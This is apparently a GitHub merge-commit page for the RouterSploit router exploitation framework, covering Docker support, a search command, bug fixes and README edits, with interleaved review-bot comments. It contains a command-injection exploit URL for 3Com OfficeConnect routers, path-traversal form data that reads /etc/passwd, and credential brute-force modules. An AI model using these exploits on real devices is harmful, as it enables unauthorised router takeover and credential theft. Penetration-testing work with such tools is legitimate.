Commit

Merge remote-tracking branch 'reverse-shell/master'
BigNerd95 committed Feb 20, 2017
2 parents 3f41dc4 + c42a0c6 commit 8a01c26
Showing 49 changed files with 1,785 additions and 123 deletions.
8 changes: 8 additions & 0 deletions Dockerfile
@@ -0,0 +1,8 @@
FROM python:2.7

WORKDIR /routersploit

RUN git clone https://github.com/reverse-shell/routersploit/ .
RUN pip install -r requirements.txt

CMD ["python", "rsf.py"]
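Review bot: the image is built from a fresh upstream clone (`RUN git clone https://github.com/reverse-shell/routersploit/ .`) rather than from the checked-out tree, so building from a fork or a branch still runs upstream master and two builds on different days produce different images; `COPY . /routersploit` would make the image match the commit it was built from. `FROM python:2.7` and an unpinned `pip install -r requirements.txt` have the same reproducibility problem, and the container runs as root, which the rsf.py workload does not need.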
11 changes: 11 additions & 0 deletions Makefile
@@ -1,5 +1,7 @@
# Makefile that aggregates common chores before commit

.PHONY: all clean lint lint-modules test build update run help

MODULE=''

all: lint test
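Review bot: `MODULE=''` assigns the literal two-character string `''` to the make variable (single quotes are not special in a make assignment), so `./run_tests.sh $(MODULE)` hands the shell `''`, which becomes one empty positional argument; if run_tests.sh distinguishes "no argument" from "empty argument" (`$#` or `-n "$1"`), it will see the latter. `MODULE=` gives the intended no-argument default.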
Expand All @@ -18,6 +20,15 @@ lint-modules:
test: clean
./run_tests.sh $(MODULE)

build:
docker build -t routersploit:latest -f Dockerfile .

update:
./run_docker.sh git pull

run:
./run_docker.sh

help:
@echo " clean"
@echo " Remove python artifacts."
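Review bot: `update` runs `git pull` through `./run_docker.sh`, which updates the clone that the Dockerfile placed inside the image layer, not the host checkout; unless run_docker.sh bind-mounts the working tree, that pull lives only in the container's writable layer and is gone when the container is removed, while the README's `cd routersploit` / `git pull` remains the real update path. Either document that or have `update` rebuild the image (i.e. depend on `build`).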
66 changes: 36 additions & 30 deletions README.md
Expand Up @@ -12,7 +12,7 @@ It consists of various modules that aids penetration testing operations:

- exploits - modules that take advantage of identified vulnerabilities
- creds - modules designed to test credentials against network services
- scanners - modules that check if target is vulnerable to any exploit
- scanners - modules that check if a target is vulnerable to any exploit

# Installation

Expand All @@ -29,7 +29,7 @@ It consists of various modules that aids penetration testing operations:
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py

## Installation on Ubuntu 16.04

sudo apt-get install python-dev python-pip libncurses5-dev git
Expand All @@ -46,16 +46,23 @@ It consists of various modules that aids penetration testing operations:
sudo pip install -r requirements.txt
./rsf.py

## Running on Docker

git clone https://github.com/reverse-shell/routersploit
cd routersploit
docker build -t routersploit:latest -f Dockerfile .
./run_docker.sh

# Update

Update RouterSploit Framework often. Project is under heavy development and new modules are shipped almost everyday.
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.

cd routersploit
git pull

# Usage

root@kalidev:~/git/routersploit# ./rsf.py
root@kalidev:~/git/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
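Review bot: the Update section still covers only the git checkout (`cd routersploit` / `git pull`), but the new "Running on Docker" section builds an image that carries its own clone, so a Docker user gets nothing from `git pull` on the host and has to run `docker build` again; add a sentence for that case. The section also relies on `./run_docker.sh`, which is not shown on this page, so a one-line description of what it does (does it mount the working tree?) would help.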
Expand All @@ -69,7 +76,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
Codename : Wildest Dreams
Version : 1.0.0

rsf >
rsf >

## 1. Exploits

Expand All @@ -78,7 +85,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >
rsf (D-LINK DIR-300 & DIR-600 RCE) >

You can use the tab key for completion.

Expand All @@ -103,7 +110,7 @@ Set options:

### Run module

Exploiting target can be achieved by issuing 'run' or 'exploit' command:
You can exploit the target by issuing the 'run' or 'exploit' command:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
Expand Down Expand Up @@ -145,9 +152,9 @@ Display information about exploit:

### Pick module

Modules located under creds/ directory allow running dictionary attacks against various network services.
Modules located in the `creds/` directory allow running dictionary attacks against various network services.

Following services are currently supported:
The following services are currently supported:

- ftp
- ssh
Expand All @@ -158,31 +165,31 @@ Following services are currently supported:

Every service has been divided into two modules:

- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).
- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. The module can be quickly used and in matter of seconds can verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against a specified account or list of accounts. It takes two parameters: login and password. These values can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).

Console:

rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >
rsf (SSH Default Creds) >

### Options

rsf (SSH Default Creds) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target IP address
port 22 Target port


Module options:

Name Current settings Description
---- ---------------- -----------
threads 8 Numbers of threads
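Review bot: the rewritten bullets still read "this kind of modules use" and "this kind of modules perform"; "this kind of module uses" / "these modules perform" would finish the grammar pass, and "in matter of seconds" wants "in a matter of seconds". The `Numbers of threads` description in the options table has the same issue as the code ("Number of threads").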
Expand Down Expand Up @@ -213,21 +220,21 @@ Set target:
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time: 38.9181981087 seconds
[+] Credentials found!

Login Password
----- --------
admin 1234

rsf (SSH Default Creds) >
rsf (SSH Default Creds) >

## 3. Scanners

Scanners allow quickly verify if the target is vulnerable to any exploits.
Scanners allow you to quickly verify if the target is vulnerable to any exploits.

### Pick module

Expand All @@ -238,7 +245,7 @@ Scanners allow quickly verify if the target is vulnerable to any exploits.
### Options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
Expand All @@ -259,11 +266,11 @@ Set target:
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure

It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use proper module and exploit target.
It has been verified that the target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use the proper module and exploit target.

rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
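Review bot: the rewritten sentence still drops two articles: "vulnerable to the dwr_932_info_disclosure exploit" and "exploit the target".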
Expand All @@ -272,7 +279,7 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

Parameter Value
--------- -----
get_wps_enable 0
Expand All @@ -285,9 +292,8 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0

# License

License has been taken from BSD licensing and applied to RouterSploit Framework.
Please see LICENSE for more details.
# License

The RouterSploit Framework is under a BSD license.
Please see [LICENSE](LICENSE) for more details.
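Review bot: "is under a BSD license" does not say which BSD variant; the old text was no more specific, but now that LICENSE is linked, naming the variant that file actually contains (2-clause or 3-clause) here would save readers a click.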
17 changes: 16 additions & 1 deletion routersploit/interpreter.py
Expand Up @@ -159,6 +159,7 @@ class RoutersploitInterpreter(BaseInterpreter):
help Print this help menu
use <module> Select a module for usage
exec <shell command> <args> Execute a command in a shell
search <search term> Search for appropriate module
exit Exit RouterSploit"""

module_help = """Module commands:
Expand All @@ -180,7 +181,7 @@ def __init__(self):
self.prompt_hostname = 'rsf'
self.show_sub_commands = ('info', 'options', 'devices', 'all', 'creds', 'exploits', 'scanners')

self.global_commands = sorted(['use ', 'exec ', 'help', 'exit', 'show '])
self.global_commands = sorted(['use ', 'exec ', 'help', 'exit', 'show ', 'search '])
self.module_commands = ['run', 'back', 'set ', 'setg ', 'check']
self.module_commands.extend(self.global_commands)
self.module_commands.sort()
Expand Down Expand Up @@ -456,5 +457,19 @@ def command_help(self, *args, **kwargs):
def command_exec(self, *args, **kwargs):
os.system(args[0])

def command_search(self, *args, **kwargs):
keyword = args[0]

if not keyword:
utils.print_error("Please specify search keyword. e.g. 'search cisco'")
return

for module in self.modules:
if keyword in module:
module = utils.humanize_path(module)
utils.print_info(
"{}\033[31m{}\033[0m{}".format(*module.partition(keyword))
)

def command_exit(self, *args, **kwargs):
raise EOFError
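Review bot: `command_search` matches with a case-sensitive substring test (`if keyword in module`), so `search Cisco` or `search DIR-300` returns nothing even though the help text in this commit suggests `search cisco`; lowercasing both sides before comparing would match what users type. `keyword = args[0]` also raises IndexError if the dispatcher ever passes an empty `args` tuple; the `if not keyword` guard only covers an empty string. Finally, the hard-coded `\033[31m` / `\033[0m` escapes ignore whether stdout is a terminal, so piping `search` output captures raw escape codes.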
4 changes: 2 additions & 2 deletions routersploit/modules/creds/ftp_bruteforce.py
Expand Up @@ -56,7 +56,7 @@ def attack(self):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
except socket.error, socket.timeout:
except (socket.error, socket.timeout):
print_error("Connection error: %s:%s" % (self.target, str(self.port)))
ftp.close()
return
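Review bot: correct fix, and not cosmetic. In Python 2 `except socket.error, socket.timeout:` is the old `except E, target` form: it catches only `socket.error` and assigns the caught exception to the target expression `socket.timeout`, which overwrites the `socket.timeout` class in the socket module on the first connection error. The tuple form catches both without that side effect. The same pattern is fixed in ftp_default.py in this commit; the other creds modules should be grepped for it.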
Expand Down Expand Up @@ -105,7 +105,7 @@ def target_function(self, running, data):
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
break
except socket.error, socket.timeout:
except (socket.error, socket.timeout):
print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
retries += 1

2 changes: 1 addition & 1 deletion routersploit/modules/creds/ftp_default.py
Expand Up @@ -54,7 +54,7 @@ def attack(self):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
except socket.error, socket.timeout:
except (socket.error, socket.timeout):
print_error("Connection error: %s:%s" % (self.target, str(self.port)))
ftp.close()
return
2 changes: 1 addition & 1 deletion routersploit/modules/creds/http_basic_bruteforce.py
Expand Up @@ -37,7 +37,7 @@ class Exploit(exploits.Exploit):
],
}

target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')

threads = exploits.Option(8, 'Numbers of threads')
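Review bot: dropping `validators=validators.url` from `target` removes the only input check on that option; the description still says the value may be a `file://` path, so presumably the URL validator rejected that form. A validator that accepts either a URL or a `file://` path would be better than none, and if `validators` is no longer referenced elsewhere in this module its import should go too.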
2 changes: 1 addition & 1 deletion routersploit/modules/creds/http_basic_default.py
Expand Up @@ -36,7 +36,7 @@ class Exploit(exploits.Exploit):
],
}

target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
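Review bot: same change as in http_basic_bruteforce.py, same concern: `target` now accepts anything, where a validator covering both URL and `file://` forms would keep the check. Check the `validators` import here as well.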
Expand Up @@ -47,7 +47,7 @@ def run(self):

data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename),
"__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
"__ENH_SUBMIT_VALUE_SHOW__": "",
"__ENH_ERROR_REDIRECT_PATH__": "",
"username": "tech"}

response = http_request(method="POST", url=url, headers=headers, data=data)
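Review bot: the form dict is duplicated between `run()` and `check()` in this file, differing only in the `__ENH_SHOW_REDIRECT_PATH__` value, so the `"Acceder"` to `""` change had to be made twice; a small helper that takes the path and returns the dict would keep the two in step. The rendered page also lost this hunk's file header, so the module name is not visible here.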
Expand All @@ -67,7 +67,7 @@ def check(self):

data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../../etc/passwd",
"__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
"__ENH_SUBMIT_VALUE_SHOW__": "",
"__ENH_ERROR_REDIRECT_PATH__": "",
"username": "tech"}

response = http_request(method="POST", url=url, headers=headers, data=data)
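Review bot: nothing on this page records why `"Acceder"` was replaced by an empty `__ENH_SUBMIT_VALUE_SHOW__` value (the merge commit message does not say); a one-line comment in the module, or a note in the commit, would tell the next reader whether the empty value is required or merely tolerated by the device.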
20 changes: 4 additions & 16 deletions routersploit/modules/exploits/3com/officeconnect_rce.py
Expand Up @@ -3,11 +3,11 @@
print_success,
print_status,
print_error,
print_info,
http_request,
mute,
validators,
random_text,
shell
)


Expand Down Expand Up @@ -40,27 +40,15 @@ def run(self):
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
self.command_loop()
shell(self, architecture="mips")
else:
print_error("Target is not vulnerable")

def command_loop(self):
while 1:
cmd = raw_input("cmd > ")

if cmd in ['exit', 'quit']:
return

print_info(self.execute(cmd))

def execute(self, cmd):
url = "{}:{}/utility.cgi?testType=1&IP=aaa || {}".format(self.target, self.port, cmd)

response = http_request(method="GET", url=url)
if response is None:
return ""

return response.text
http_request(method="GET", url=url)
return ""

@mute
def check(self):
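Review bot: `execute` now discards the HTTP response and returns `""` unconditionally, which matches the status line that this is blind injection, but it also swallows the case where `http_request` returns None (connection failure): the old code at least distinguished that path. A `print_error` when the response is None would let the operator see that the request never went out. If the new `shell()` helper uses `execute`'s return value to judge success, an always-empty string may make it report every command as failed, which is worth checking before relying on `architecture="mips"` handling in that helper.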